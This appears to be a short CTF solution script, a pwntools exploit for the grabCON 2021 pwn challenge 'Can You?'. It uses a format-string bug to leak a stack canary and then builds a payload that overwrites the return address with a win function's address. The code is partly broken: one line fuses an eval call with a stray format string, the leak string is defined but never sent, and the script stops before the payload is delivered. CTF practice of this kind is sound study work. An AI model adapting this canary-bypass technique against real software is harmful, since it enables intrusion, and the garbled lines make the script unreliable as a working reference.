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Created September 6, 2021 07:49
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grabCONCTF2021 - pwn - `Can You?`
#!/usr/bin/env python3
from pwn import *
context.arch = 'i386'
we saw that there is a format string vulnerability. so, it is easy to get the stack cookie value and add it in a proper way to
successfully over write the value of return pointer.
canary_format_str = "%31$p" # format string for canary.
win = p32(0x08049236) # win function
io = process('./cancancan')
io.recvline('can you bypass me???')
canary = eval(io.recv().decode().strip())"Canary: {}".format(hex(canary)))
#ret overwrite
offset = 116 # return pointer is at 116 bytes away from the input buffer.
padding = b"A"*100
payload = padding+p32(canary) # add the stack canary in the payload to its proper position so that stack check may not failed.
payload = payload+b"A"*(116-len(payload))+win
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